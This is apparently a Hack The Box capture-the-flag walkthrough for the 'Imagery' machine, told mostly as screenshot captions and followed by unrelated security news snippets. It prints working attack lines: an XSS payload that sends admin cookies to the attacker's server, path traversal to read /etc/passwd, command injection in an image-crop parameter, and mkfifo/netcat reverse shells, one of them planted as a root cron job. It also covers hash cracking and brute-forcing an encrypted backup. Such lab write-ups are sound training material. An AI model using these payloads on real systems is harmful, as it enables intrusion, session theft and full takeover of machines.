In this write-up, we will explore the βImageryβ machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the βImageryβ machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Enumerating the Imagery Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Port 22 (SSH): SSH is available for remote access and may be used later if valid credentials are obtained.
Port 8000 (HTTP): A Python-based web application is exposed on port 8000 and represents the primary attack surface for further enumeration.
Web Enumeration:
Web Application Exploration:
Features the appβs slogan βCapture & Cherish Every Momentβ in large white text, followed by a description: βYour personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.β Below that, a white section titled βPowerful Features at Your Fingertipsβ with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes βHome,β βLogin,β and βRegister.β
Application Overview
Centred white form on blue background titled βRegisterβ. Fields: βEmail IDβ (placeholder: βEnter your email IDβ) and βPasswordβ (placeholder: βEnter your passwordβ with eye icon for visibility). Blue βRegisterβ button. ja
Fields pre-filled: βEmail IDβ as βdark@imagery.htbβ and masked βPasswordβ. Blue βRegisterβ button.
Similar to register, titled βLoginβ. Fields pre-filled: βEmail IDβ as βdark@imagery.htbβ and masked βPasswordβ. Blue βLoginβ button, plus βDonβt have an account? Register hereβ link. Top nav: βHomeβ, βLoginβ, βRegisterβ.
White background with title βYour Image Galleryβ. A card message: βNo images uploaded yet. Go to the βUploadβ page to add some!β Logged-in nav: βHomeβ, βGalleryβ, βUploadβ, βLogoutβ (red button).
Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.
JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.
404 Not Found response when accessing the root /admin endpoint directly.
JSON access denied response (βAdministrator privileges requiredβ) when trying to access /admin/users as a non-admin user.
405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).
Stored Cross-Site Scripting in Bug Reporting Feature on Imagery Machine
βReport a Bugβ form pre-filled with βbugNameβ: βdarkβ and the same XSS cookie-stealing payload in Bug Details, ready for submission.
Terminal session as user βdark@parrotβ running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.
Burp Suite capture of a successful POST to /report_bug, submitting JSON with βbugNameβ: βdarkβ and XSS payload in βbugDetailsβ (<img src=x onerror=βdocument.location=βhttp://10.10.14.133:80/?cookie=β+document.cookieβ>), response confirms submission with admin review message.
The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attackerβs server.
Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username βdark@imagery.htbβ, isAdmin false).
Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.
Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.
Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).
JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
Local File Inclusion Leading to Credential Disclosure
Failed LFI attempt on non-existent path returning 500 Internal Server Error with βError reading file: 404 Not Foundβ.
Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload β../../../../../../etc/passwdβ.
Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.
Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.
LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=βdb.jsonβ, upload folders, and allowed extensions.
CrackStation online tool cracking the MD5 hash β2c65c8d7bfbca32a3ed42596192384f6β to plaintext βiambatmanβ.
Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
Authenticating to the Imagery Application Using TestUserβs Credentials
Login page with Email ID pre-filled as βtestuser@imagery.htbβ and masked password field.
Empty Gallery page for logged-in user stating βNo images uploaded yet. Go to the βUploadβ page to add some!β
Upload New Image form with βlips.pngβ selected (max 1MB, allowed formats listed), optional title/description, group βMy Imagesβ, uploading as Account ID e5f6g7h8.
Achieving Shell Access via Remote Code Execution
Gallery view showing single uploaded image βlipsβ (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.
Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.
Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.
Burp capture of POST to /apply_visual_transform with invalid crop βxβ:βidβ parameter resulting in 500 error (βinvalid argument for option β-crop'β).
Burp capture of POST to /apply_visual_transform injecting βcat /etc/passwdβ via crop βxβ parameter, resulting in 500 error exposing command output snippet.
Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).
Burp capture of POST to /apply_visual_transform with reverse shell payload in crop βxβ parameter (βrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/fβ).
Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.
Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.
Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).
Target starting Python HTTP server on port 9007 to serve the encrypted backup file.
Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the targetβs HTTP server on port 9007.
File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.
Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for βpyAesCryptβ (case-sensitive import issue).
Successful pip3 user installation of pyaescrypt-6.1.1 package.
Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for βtermcolorβ (missing import dependency).
Successful pip3 user installation of termcolor-3.3.0 package.
Custom pyAesCrypt brute-forcer discovering password βbestfriendsβ early in the wordlist.
Successful decryption of the AES backup using βbestfriendsβ, outputting the original web_20250806_120723.zip.
The cunzip extracting the decrypted backup archive, revealing full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.
cat of decrypted db.json revealing user database with admin (hashed password), testuser (βiambatmanβ), and mark (another hashed password).
CrackStation results cracking MD5 hashes to βiambatmanβ, βsupersmashβ, and βspiderweb1234β (one unknown).
Successful su to mark using password βsupersmashβ, confirming uid/gid 1002.
Python one-liner (python3 -c βimport pty;pty.spawn(β/bin/bashβ)β) to spawn an interactive bash shell.
ls -al in /home/mark showing files including user.txt (likely containing the flag).
We can read the user flag by typing the βcat user.txtβ command
Escalate to Root Privileges Access to Imagery Machine
Privilege Escalation:
sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).
charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).
Failed charcol shell passphrase attempts (βbestfriendβ, βsupermashβ, βsupersmashβ) resulting in lockout after multiple errors.
sudo charcol -R resetting application password to default (βno passwordβ mode) after system password verification.
sudo charcol -R resetting application password to default (βno passwordβ mode) after system password verification.
Repeated sudo charcol -R successfully resetting to no password mode.
charcol interactive shell entry after initial setup, displaying ASCII logo and info message.
charcol help output explaining backup/fetch commands and βauto addβ for managing automated (root) cron jobs, with security warnings.
Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.
Successful βauto addβ command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password βsupersmashβ.
Successful privilege escalation to root via a malicious cron job triggered a reverse shell, followed by reading the root flag from /root/root.txt
Microsoft has confirmed a controversial new feature coming to Teams that will automatically reveal employee work locations by detecting which Wi-Fi networks they connect to raising significant concerns about workplace surveillance and hybrid work policies. The feature, documented in Microsoftβs 365 Roadmap and Admin Centre (Message ID MC1081568), will automatically set usersβ work location when [β¦]
Microsoft has announced the public preview of the Windows App Development CLI (winapp), a new open-source command-line tool designed to simplify Windows application development across multiple frameworks and toolchains. The tool is now available on GitHub for developers working outside traditional Visual Studio or MSBuild environments. The winapp CLI targets developers using cross-platform frameworks including [β¦]
Microsoft has confirmed that it provided BitLocker encryption recovery keys to the FBI following a valid search warrant, marking the first publicly known case of the technology giant sharing encryption keys with law enforcement. The disclosure occurred after federal investigators in Guam requested access to three encrypted laptops believed to contain evidence of fraud in [β¦]
Microsoft Defender researchers have exposed a sophisticated adversary-in-the-middle (AiTM) phishing campaign targeting energy sector organizations, leveraging SharePoint file-sharing services to bypass traditional email security controls and compromise multiple user accounts. SharePoint Abuse for Initial Access The attack began with a phishing email sent from a compromised trusted vendorβs email address, embedding SharePoint URLs that mimicked [β¦]
The threat actors have begun actively exploiting a critical authentication bypass vulnerability in GNU InetUtils telnetd immediately after proof-of-concept code became publicly available. The flaw allows remote attackers to gain root access without authentication, triggering widespread exploitation attempts across internet-exposed systems. The security flaw affects GNU InetUtils telnetd versions 1.9.3 through 2.7, with the vulnerable [β¦]
Itβs 2026 and attackers are still getting root shells via Telnet with a single command that requires no password whatsoever. π
SSH has existed for 31 years. Yet 221,000 telnet servers are still running online, and a bug hidden in the code since 2015 just handed attackers the keys to the kingdom.
CVE-2026-24061. CVSS 9.8. Critical.
The vulnerability sat in GNU InetUtils telnetd for almost 11 years before anyone noticed. Security researcher Kyu Neushwaistein found it on January 20, 2026, and by January 21, attackers were already exploiting it in the wild.
A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT.
"The attack begins with social engineering lures delivered via business-themed documents crafted to appear routine and benign," Fortinet FortiGuard Labs researcher Cara Lin said in a technical breakdown published this week. "These documents and
The Russian nation-state hacking group known as Sandworm has been attributed to what has been described as the "largest cyber attack" targeting Poland's power system in the last week of December 2025.
The attack was unsuccessful, the country's energy minister, Milosz Motyka, said last week.
"The command of the cyberspace forces has diagnosed in the last days of the year the strongest attack on
AI agents are accelerating how work gets done. They schedule meetings, access data, trigger workflows, write code, and take action in real time, pushing productivity beyond human speed across the enterprise.
Then comes the moment every security team eventually hits:
βWaitβ¦ who approved this?β
Unlike users or applications, AI agents are often deployed quickly, shared broadly,
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a critical security flaw affecting Broadcom VMware vCenter Server that was patched in June 2024 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
The vulnerability in question is CVE-2024-37079 (CVSS score: 9.8), which refers to a heap overflow in the
In 2026, data has become the most valuable asset for businesses and the most targeted. With rising ransomware attacks, insider threats, AI-driven breaches, and strict global data protection regulations, organizations can no longer rely on basic security controls. This has fueled massive demand for advanced data security companies that can protect sensitive information across cloud, [β¦]
Scammers are increasingly using visually stylized QR codes to deliver phishing links, Help Net Security reports.
QR code phishing (quishing) is already more difficult to detect, since these codes deliver links without a visible URL. Attackers are now using QR codes with colors, shapes, and logos woven into the codeβs pattern.
LoginProfessional Hackers
The Hacker News
Hack In The Box
